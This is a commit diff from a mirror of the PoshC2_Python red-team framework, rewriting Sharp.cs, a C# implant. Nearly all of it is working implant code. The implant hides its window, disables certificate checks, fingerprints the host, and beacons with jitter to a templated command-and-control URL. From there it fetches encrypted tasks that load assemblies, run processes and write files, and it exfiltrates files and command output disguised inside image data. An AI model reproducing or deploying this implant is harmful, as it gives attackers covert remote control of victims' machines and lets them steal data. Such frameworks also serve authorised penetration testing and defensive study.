infosecn1nja
/
PoshC2_Python
mirror of https://github.com/infosecn1nja/PoshC2_Python.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update sharp.cs 

[+] use of ManualResetEvents instead of Thread.Sleep
[+] Add Jitter to beacontime
[+] General tidy up
chunking
rolen 2019-01-03 18:33:10 +00:00
parent 782429387f
commit 205d4f3693
1 changed files with 432 additions and 493 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

877
Files/Sharp.cs
View File

@ -16,519 +16,458 @@ using System.Collections.Generic;
public class Program public class Program
{ {
[DllImport("kernel32.dll")] [DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow(); static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")] [DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
public const int SW_HIDE = 0; public const int SW_HIDE = 0;
public const int SW_SHOW = 5; public const int SW_SHOW = 5;
public static string scode = ""; public static string scode = "";
public static string proc = @"c:\windows\system32\netsh.exe"; public static string proc = @"c:\windows\system32\netsh.exe";
public static void Sharp() public static void Sharp()
{ {
var handle = GetConsoleWindow(); var handle = GetConsoleWindow();
ShowWindow(handle, SW_HIDE); ShowWindow(handle, SW_HIDE);
AllowUntrustedCertificates(); AllowUntrustedCertificates();
try { primer(); } catch { } try { primer(); } catch { }
Thread.Sleep(300000); var mre = new System.Threading.ManualResetEvent(false);
try { primer(); } catch { } mre.WaitOne(300000);
Thread.Sleep(600000); try { primer(); } catch { }
try { primer(); } catch { } mre.WaitOne(600000);
} try { primer(); } catch { }
}
public static void Main() public static void Main()
{ {
Sharp(); Sharp();
} }
static byte[] Combine(byte[] first, byte[] second) static byte[] Combine(byte[] first, byte[] second)
{ {
byte[] ret = new byte[first.Length + second.Length]; byte[] ret = new byte[first.Length + second.Length];
Buffer.BlockCopy(first, 0, ret, 0, first.Length); Buffer.BlockCopy(first, 0, ret, 0, first.Length);
Buffer.BlockCopy(second, 0, ret, first.Length, second.Length); Buffer.BlockCopy(second, 0, ret, first.Length, second.Length);
return ret; return ret;
} }
static System.Net.WebClient GetWebRequest(string cookie) static System.Net.WebClient GetWebRequest(string cookie)
{ {
var x = new System.Net.WebClient(); var x = new System.Net.WebClient();
string purl = "#REPLACEPROXYURL#"; var purl = "#REPLACEPROXYURL#";
string puser = "#REPLACEPROXYUSER#"; var puser = "#REPLACEPROXYUSER#";
string ppass = "#REPLACEPROXYPASSWORD#"; var ppass = "#REPLACEPROXYPASSWORD#";
if (!String.IsNullOrEmpty(purl)) { if (!String.IsNullOrEmpty(purl))
WebProxy proxy = new WebProxy(); {
proxy.Address = new Uri(purl); WebProxy proxy = new WebProxy();
proxy.Credentials = new NetworkCredential(puser, ppass); proxy.Address = new Uri(purl);
proxy.UseDefaultCredentials = false; proxy.Credentials = new NetworkCredential(puser, ppass);
proxy.BypassProxyOnLocal = false; proxy.UseDefaultCredentials = false;
x.Proxy = proxy; proxy.BypassProxyOnLocal = false;
} x.Proxy = proxy;
}
string df = "#REPLACEDF#"; var df = "#REPLACEDF#";
if (!String.IsNullOrEmpty(df)) { if (!String.IsNullOrEmpty(df))
x.Headers.Add("Host",df); x.Headers.Add("Host", df);
}
x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#"); x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#");
x.Headers.Add("Referer", "#REPLACEREFERER#"); x.Headers.Add("Referer", "#REPLACEREFERER#");
if (cookie != null) if (null != cookie)
{ x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
}
return x; return x;
} }
static string Decryption(string key, string enc) static string Decryption(string key, string enc)
{ {
var b = System.Convert.FromBase64String(enc); var b = System.Convert.FromBase64String(enc);
Byte[] IV = new Byte[16]; var IV = new Byte[16];
Array.Copy(b, IV, 16); Array.Copy(b, IV, 16);
try { try
var a = CAMR(key, System.Convert.ToBase64String(IV)); {
var d = a.CreateDecryptor(); var a = CreateCam(key, System.Convert.ToBase64String(IV));
var u = d.TransformFinalBlock(b, 16, b.Length - 16); var u = a.CreateDecryptor().TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u); return System.Text.Encoding.UTF8.GetString(u);
} catch { }
var a = CAMA(key, System.Convert.ToBase64String(IV)); catch
var d = a.CreateDecryptor(); {
var u = d.TransformFinalBlock(b, 16, b.Length - 16); var a = CreateCam(key, System.Convert.ToBase64String(IV), false);
return System.Text.Encoding.UTF8.GetString(u); var u = a.CreateDecryptor().TransformFinalBlock(b, 16, b.Length - 16);
} return System.Text.Encoding.UTF8.GetString(u);
}
finally
{
Array.Clear(b, 0, b.Length);
Array.Clear(IV, 0, 16);
}
}
} static string Encryption(string key, string un, bool comp = false, byte[] unByte = null)
{
byte[] byEnc = null;
if (unByte != null)
byEnc = unByte;
else
byEnc = System.Text.Encoding.UTF8.GetBytes(un);
static string Encryption(string key, string un, bool comp = false, byte[] unByte = null) if (comp)
{ byEnc = Compress(byEnc);
byte[] b = null;
if (unByte != null) {
b = unByte;
} else {
b = System.Text.Encoding.UTF8.GetBytes(un);
}
byte[] byEnc = b;
if (comp){
byEnc = Compress(b);
}
try {
var a = CAMR(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
} catch {
var a = CAMA(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
}
}
static System.Security.Cryptography.AesCryptoServiceProvider CAMA(string key,string IV) try
{ {
System.Security.Cryptography.AesCryptoServiceProvider b = new System.Security.Cryptography.AesCryptoServiceProvider(); var a = CreateCam(key, null);
b.Mode = System.Security.Cryptography.CipherMode.CBC; var f = a.CreateEncryptor().TransformFinalBlock(byEnc, 0, byEnc.Length);
b.Padding = System.Security.Cryptography.PaddingMode.Zeros; return System.Convert.ToBase64String(Combine(a.IV, f));
b.BlockSize = 128; }
b.KeySize = 256; catch
{
var a = CreateCam(key, null, false);
var f = a.CreateEncryptor().TransformFinalBlock(byEnc, 0, byEnc.Length);
return System.Convert.ToBase64String(Combine(a.IV, f));
}
}
if (IV != null) static System.Security.Cryptography.SymmetricAlgorithm CreateCam(string key, string IV, bool rij = true)
{ {
b.IV = System.Convert.FromBase64String(IV); System.Security.Cryptography.SymmetricAlgorithm a = null;
} if (rij)
a = new System.Security.Cryptography.RijndaelManaged();
else
a = new System.Security.Cryptography.AesCryptoServiceProvider();
if (key != null) a.Mode = System.Security.Cryptography.CipherMode.CBC;
{ a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
b.Key = System.Convert.FromBase64String(key); a.BlockSize = 128;
} a.KeySize = 256;
return b; if (null != IV)
} a.IV = System.Convert.FromBase64String(IV);
else
a.GenerateIV();
static System.Security.Cryptography.RijndaelManaged CAMR(string key,string IV) if (null != key)
{ a.Key = System.Convert.FromBase64String(key);
System.Security.Cryptography.RijndaelManaged a = new System.Security.Cryptography.RijndaelManaged();
a.Mode = System.Security.Cryptography.CipherMode.CBC;
a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
a.BlockSize = 128;
a.KeySize = 256;
if (IV != null) return a;
{ }
a.IV = System.Convert.FromBase64String(IV); static void AllowUntrustedCertificates()
} {
try
{
System.Net.ServicePointManager.ServerCertificateValidationCallback = (z, y, x, w) => { return true; };
}
catch { }
}
if (key != null) static void primer()
{ {
a.Key = System.Convert.FromBase64String(key); if (Convert.ToDateTime("#REPLACEKILLDATE#") > DateTime.Now)
} {
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
var dn = System.Environment.UserDomainName;
var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
var o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#";
return a; var primer = GetWebRequest(Encryption(key, o)).DownloadString(s);
} var x = Decryption(key, primer);
static void AllowUntrustedCertificates() var re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
{ var m = re.Match(x);
try string RandomURI = m.Groups[1].ToString();
{
System.Net.ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(delegate { return true; } );
}
catch { }
}
static void primer() re = new Regex("URLS10484390243(.*)34209348401SLRU");
{ m = re.Match(x);
DateTime now = DateTime.Now; string URLS = m.Groups[1].ToString();
DateTime killDate = Convert.ToDateTime("#REPLACEKILLDATE#");
if (killDate < now){
//Console.ReadLine();
} else {
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
var dn = System.Environment.UserDomainName;
var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
string o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
string key = "#REPLACEKEY#";
var pp = Encryption(key, o);
string baseURL = "#REPLACEBASEURL#";
string s = "#REPLACESTARTURL#";
var primer = GetWebRequest(pp).DownloadString(s);
var x = Decryption(key, primer);
Regex re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR"); re = new Regex("KILLDATE1665(.*)5661ETADLLIK");
Match m = re.Match(x); m = re.Match(x);
string RandomURI = m.Groups[1].ToString(); var KillDate = m.Groups[1].ToString();
re = new Regex("URLS10484390243(.*)34209348401SLRU"); re = new Regex("SLEEP98001(.*)10089PEELS");
m = re.Match(x); m = re.Match(x);
string URLS = m.Groups[1].ToString(); var Sleep = m.Groups[1].ToString();
re = new Regex("KILLDATE1665(.*)5661ETADLLIK"); re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
m = re.Match(x); m = re.Match(x);
var KillDate = m.Groups[1].ToString(); var NewKey = m.Groups[1].ToString();
re = new Regex("SLEEP98001(.*)10089PEELS"); re = new Regex("IMGS19459394(.*)49395491SGMI");
m = re.Match(x); m = re.Match(x);
var Sleep = m.Groups[1].ToString(); var IMGs = m.Groups[1].ToString();
re = new Regex("NEWKEY8839394(.*)4939388YEKWEN"); ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
m = re.Match(x); }
var NewKey = m.Groups[1].ToString(); }
re = new Regex("IMGS19459394(.*)49395491SGMI"); static byte[] Compress(byte[] raw)
m = re.Match(x); {
var IMGs = m.Groups[1].ToString(); using (var memory = new MemoryStream())
using (var gzip = new GZipStream(memory, CompressionMode.Compress, true))
{
gzip.Write(raw, 0, raw.Length);
return memory.ToArray();
}
}
ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs); static Type LoadSomething(string assemblyQualifiedName)
} {
return Type.GetType(assemblyQualifiedName, (name) =>
{
return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault();
}, null, true);
}
internal static class UrlGen
{
static List<String> _stringnewURLS = new List<String>();
static String _randomURI;
static String _baseUrl;
static Random _rnd = new Random();
static Regex _re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+", RegexOptions.Compiled);
internal static void Init(string stringURLS, String RandomURI, String baseUrl)
{
_stringnewURLS = _re.Matches(stringURLS.Replace(",", "").Replace(" ", "")).Cast<Match>().Select(m => m.Value).Where(m => !string.IsNullOrEmpty(m)).ToList();
_randomURI = RandomURI;
_baseUrl = baseUrl;
} }
static byte[] Compress(byte[] raw) internal static String GenerateUrl()
{ {
using (MemoryStream memory = new MemoryStream()) string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)];
{ return $"{_baseUrl}/{URL}{Guid.NewGuid()}/?{_randomURI}";
using (GZipStream gzip = new GZipStream(memory, CompressionMode.Compress, true)) }
{ }
gzip.Write(raw, 0, raw.Length);
}
return memory.ToArray();
}
}
static byte[] GetImgData(byte[] cmdoutput, string[] stringnewIMGS) internal static class ImgGen
{ {
Random rnd = new Random(); static Random _rnd = new Random();
string randimg = stringnewIMGS[rnd.Next(stringnewIMGS.Length)]; static Regex _re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+", RegexOptions.Compiled);
byte[] imgBytes = System.Convert.FromBase64String(randimg); static List<String> _newImgs = new List<String>();
var maxByteslen = 1500;
var maxDatalen = 1500 + cmdoutput.Length;
var imageByteslen = imgBytes.Length;
var paddingByteslen = maxByteslen - imageByteslen;
var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(paddingByteslen)));
var ImageBytesFull = new byte[maxDatalen]; internal static void Init(String stringIMGS)
System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length); {
System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length); var stringnewIMGS = _re.Matches(stringIMGS.Replace(",", "")).Cast<Match>().Select(m => m.Value);
System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length); stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m));
return ImageBytesFull; }
}
static Random random = new Random(); static string RandomString(int length)
{
const string chars = "...................@..........................Tyscf";
return new string(Enumerable.Repeat(chars, length).Select(s => s[_rnd.Next(s.Length)]).ToArray());
}
static string RandomString(int length) internal static byte[] GetImgData(byte[] cmdoutput)
{ {
const string chars = "...................@..........................Tyscf"; Int32 maxByteslen = 1500, maxDatalen = cmdoutput.Length + maxByteslen;
return new string(Enumerable.Repeat(chars, length).Select(s => s[random.Next(s.Length)]).ToArray()); var randimg = _newImgs[(new Random()).Next(0, _newImgs.Count)];
} var imgBytes = System.Convert.FromBase64String(randimg);
var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(maxByteslen - imgBytes.Length)));
var ImageBytesFull = new byte[maxDatalen];
static Type LoadSomething(string assemblyQualifiedName) System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length);
{ System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length);
// Throws exception is type was not found System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length);
return Type.GetType( return ImageBytesFull;
assemblyQualifiedName, }
(name) => }
{
// Returns the assembly of the type by enumerating loaded assemblies
// in the app domain
return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault();
},
null,
true);
}
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS) static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
{ {
var re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+"); UrlGen.Init(stringURLS, RandomURI, baseURL);
ImgGen.Init(stringIMGS);
string strURLS = stringURLS.Replace(",",""); if (!Int32.TryParse(Sleep, out int beacontime))
strURLS = strURLS.Replace(" ",""); beacontime = 5;
var stringnewURLS = re.Matches(strURLS).Cast<Match>().Select(m => m.Value).ToArray();
stringnewURLS = stringnewURLS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
string strIMGS = stringIMGS.Replace(",",""); var strOutput = new StringWriter();
var stringnewIMGS = re.Matches(strIMGS).Cast<Match>().Select(m => m.Value).ToArray(); Console.SetOut(strOutput);
stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m)).ToArray(); var exitvt = new ManualResetEvent(false);
var output = new StringBuilder();
while (!exitvt.WaitOne((int)(beacontime * 1000 * (((new Random()).Next(0, 2) > 0) ? 1.05 : 0.95))))
{
if (Convert.ToDateTime(KillDate) > DateTime.Now)
{
exitvt.Set();
continue;
}
output.Length = 0;
try
{
String x = "", tasksrc = "", cmd = null;
try
{
cmd = GetWebRequest(null).DownloadString(UrlGen.GenerateUrl());
x = Decryption(Key, cmd).Replace("\0", string.Empty);
}
catch
{
continue;
} //CAN YOU CONTINUE FROM THIS POINT?
int beacontime = 5; if (x.ToLower().StartsWith("multicmd"))
{
var splitcmd = x.Replace("multicmd", "");
var split = splitcmd.Split(new string[] { "!d-3dion@LD!-d" }, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
tasksrc = c;
if (c.ToLower().StartsWith("exit"))
{
exitvt.Set();
break;
}
else if (c.ToLower().StartsWith("loadmodule"))
{
var module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
var assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
output.AppendLine("Module loaded sucessfully");
tasksrc = "Module loaded sucessfully";
}
else if (c.ToLower().StartsWith("upload-file"))
{
var path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase);
var splitargs = path.Split(new string[] { ";" }, StringSplitOptions.RemoveEmptyEntries);
Console.WriteLine("Uploaded file to: " + splitargs[1]);
var fileBytes = Convert.FromBase64String(splitargs[0]);
System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes);
tasksrc = "Uploaded file sucessfully";
}
else if (c.ToLower().StartsWith("download-file"))
{
var path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase);
var file = File.ReadAllBytes(path.Replace("\"", ""));
var fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file);
if (!Int32.TryParse(Sleep, out beacontime)) var dtask = Encryption(Key, c);
{ var dcoutput = Encryption(Key, "", true, fileChuck);
beacontime = 5; var doutputBytes = System.Convert.FromBase64String(dcoutput);
} var dsendBytes = ImgGen.GetImgData(doutputBytes);
var strOutput = new StringWriter(); GetWebRequest(dtask).UploadData(UrlGen.GenerateUrl(), dsendBytes);
Console.SetOut(strOutput); }
bool bExit = true; else if (c.ToLower().StartsWith("listmodules"))
while(bExit) {
{ var appd = AppDomain.CurrentDomain.GetAssemblies();
Random rnd = new Random(); output.AppendLine("[+] Modules loaded:").AppendLine("");
string URL = stringnewURLS[rnd.Next(stringnewURLS.Length)]; foreach (var ass in appd)
string G = (Guid.NewGuid()).ToString(); output.AppendLine(ass.FullName.ToString());
URL = baseURL+"/"+URL+G+"/?"+RandomURI; }
Thread.Sleep(beacontime*1000); else if (c.ToLower().StartsWith("$shellcode"))
scode = c.Substring(13, c.Length - 13).Replace("\"", "");
DateTime now = DateTime.Now; else if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe"))
DateTime killDate = Convert.ToDateTime(KillDate); {
if (killDate < now){ var splitargs = c.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
bExit = false; int i = 0;
} string method = "", splittheseargs = "", qualifiedname = "", name = "";
string output = ""; foreach (var a in splitargs)
try { {
string cmd = null; if (i == 1)
string x = ""; qualifiedname = a;
string tasksrc = ""; if (i == 2)
try { name = a;
cmd = GetWebRequest(null).DownloadString(URL);
x = Decryption(Key, cmd);
x = x.Replace("\0", string.Empty);
} catch {}
if (x.ToLower().StartsWith("multicmd"))
{
string splitcmd = x.Replace("multicmd","");
string[] split = splitcmd.Split(new string[] {"!d-3dion@LD!-d"}, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
tasksrc = c;
output = "";
//add upload-file
if (c.ToLower().StartsWith("loadmodule")){ if (c.ToLower().StartsWith("run-exe"))
string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase); if (i > 2)
Assembly assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module)); splittheseargs = splittheseargs + " " + a;
output += "Module loaded sucessfully"; else
tasksrc = "Module loaded sucessfully"; if (i == 3)
} method = a;
else if (i > 3)
splittheseargs = splittheseargs + " " + a;
i++;
}
var splitnewargs = splittheseargs.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
foreach (var Ass in AppDomain.CurrentDomain.GetAssemblies())
{
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
{
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
try
{
if (c.ToLower().StartsWith("run-exe"))
output.AppendLine(loadedType.Assembly.EntryPoint.Invoke(null, new object[] { splitnewargs }).ToString());
else
{
try
{
output.AppendLine(loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { splitnewargs }).ToString());
}
catch
{
output.AppendLine(loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, null).ToString());
}
}
}
catch { }
}
}
}
else if (c.ToLower().StartsWith("start-process"))
{
var proc = c.Replace("'", "").Replace("\"", "");
var pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
var args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
var p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = p.StartInfo.RedirectStandardError = p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = pstart;
p.StartInfo.Arguments = args;
p.Start();
output.AppendLine(p.StandardOutput.ReadToEnd()).AppendLine(p.StandardError.ReadToEnd());
p.WaitForExit();
}
else if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon"))
{
var bcnRgx = new Regex(@"(?<=(setbeacon|beacon)\s{1,})(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.Compiled | RegexOptions.IgnoreCase);
var mch = bcnRgx.Match(c);
if (mch.Success)
{
beacontime = Int32.Parse(mch.Groups["t"].Value);
switch (mch.Groups["u"].Value)
{
case "h":
beacontime *= 3600;
break;
case "m":
beacontime *= 60;
break;
}
}
else
output.AppendLine($@"[X] Invalid time ""{c}""");
}
if (c.ToLower().StartsWith("upload-file")){ output.AppendLine(strOutput.ToString());
string path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase); var sb = strOutput.GetStringBuilder();
string[] splitargs = path.Split(new string[] {";"}, StringSplitOptions.RemoveEmptyEntries); sb.Remove(0, sb.Length);
Console.WriteLine("Uploaded file to: " + splitargs[1]); if (tasksrc.Length > 200)
byte[] fileBytes = Convert.FromBase64String(splitargs[0]); tasksrc = tasksrc.Substring(0, 199);
System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes); var task = Encryption(Key, tasksrc);
tasksrc = "Uploaded file sucessfully"; var coutput = Encryption(Key, output.ToString(), true);
} var outputBytes = System.Convert.FromBase64String(coutput);
var sendBytes = ImgGen.GetImgData(outputBytes);
if (c.ToLower().StartsWith("download-file")){ GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
string path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase); }
byte[] file = File.ReadAllBytes(path.Replace("\"", "")); }
byte[] fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file); }
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)]; catch (Exception e)
G = (Guid.NewGuid()).ToString(); {
URL = baseURL+"/"+URL+G+"/?"+RandomURI; var task = Encryption(Key, "Error");
string dtask = Encryption(Key, c); var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true);
string dcoutput = Encryption(Key, "", true, fileChuck); var outputBytes = System.Convert.FromBase64String(eroutput);
byte[] doutputBytes = System.Convert.FromBase64String(dcoutput); var sendBytes = ImgGen.GetImgData(outputBytes);
byte[] dsendBytes = GetImgData(doutputBytes, stringnewIMGS); GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
GetWebRequest(dtask).UploadData(URL, dsendBytes); }
} }
}
if (c.ToLower().StartsWith("listmodules")){
var appd = AppDomain.CurrentDomain.GetAssemblies();
output += "[+] Modules loaded: \n\n";
foreach (var ass in appd)
{
output += ass.FullName.ToString() + "\n";
}
}
if (c.ToLower().StartsWith("$shellcode")){
string sc = c.Substring(13,c.Length - 13);
sc = sc.Replace("\"", "");
scode = sc;
}
if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe")){
string[] splitargs = c.Split(new string[] {" "}, StringSplitOptions.RemoveEmptyEntries);
int i = 0;
string method = "";
string splittheseargs = "";
string qualifiedname = "";
string name = "";
foreach (string a in splitargs) {
if (i == 1){
qualifiedname = a;
}
if (i == 2){
name = a;
}
if (c.ToLower().StartsWith("run-exe")) {
if (i > 2){
splittheseargs = splittheseargs + " " + a;
}
} else {
if (i == 3){
method = a;
}
if (i > 3){
splittheseargs = splittheseargs + " " + a;
}
}
i ++;
}
string[] splitnewargs = splittheseargs.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
var myList = new List<string>();
foreach (var arg in splitnewargs) {
myList.Add(arg);
}
var AppDomainAss = AppDomain.CurrentDomain.GetAssemblies();
foreach (var Ass in AppDomainAss)
{
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
{
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
try {
if (c.ToLower().StartsWith("run-exe")) {
var xxx = loadedType.Assembly.EntryPoint.Invoke(null, new object[] { myList.ToArray() });
output = xxx.ToString();
} else {
try {
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { myList.ToArray() });
output = xxx.ToString();
} catch {
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, null);
output = xxx.ToString();
}
}
} catch { }
}
}
}
if (c.ToLower().StartsWith("exit")){
bExit = false;
}
if (c.ToLower().StartsWith("start-process")){
string proc = c.Replace("'", "");
proc = proc.Replace("\"", "");
string pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
string args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
Process p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = pstart;
p.StartInfo.Arguments = args;
p.Start();
output = p.StandardOutput.ReadToEnd();
output = output + p.StandardError.ReadToEnd();
p.WaitForExit();
}
if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon")) {
string beacon = Regex.Replace(c, "setbeacon ", "", RegexOptions.IgnoreCase);
beacon = Regex.Replace(beacon, "beacon ", "", RegexOptions.IgnoreCase);
if (beacon.ToLower().Contains("s"))
{
beacon = Regex.Replace(beacon, "s", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
}
else if (beacon.ToLower().Contains("m"))
{
beacon = Regex.Replace(beacon, "m", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
beacontime = beacontime * 60;
}
else if (beacon.ToLower().Contains("h"))
{
beacon = Regex.Replace(beacon, "h", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
beacontime = beacontime * 60;
beacontime = beacontime * 60;
}
else if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
}
output += strOutput.ToString();
StringBuilder sb = strOutput.GetStringBuilder();
sb.Remove(0, sb.Length);
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
if (tasksrc.Length > 200) {
tasksrc = tasksrc.Substring(0,199);
}
string task = Encryption(Key, tasksrc);
string coutput = Encryption(Key, output, true);
byte[] outputBytes = System.Convert.FromBase64String(coutput);
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
GetWebRequest(task).UploadData(URL, sendBytes);
}
}
} catch (Exception e) {
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
URL = baseURL+"/"+URL+RandomURI;
string task = Encryption(Key, "Error");
string eroutput = Encryption(Key, "Error: " + output + e, true);
byte[] outputBytes = System.Convert.FromBase64String(eroutput);
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
GetWebRequest(task).UploadData(URL, sendBytes);
}
}
}
} }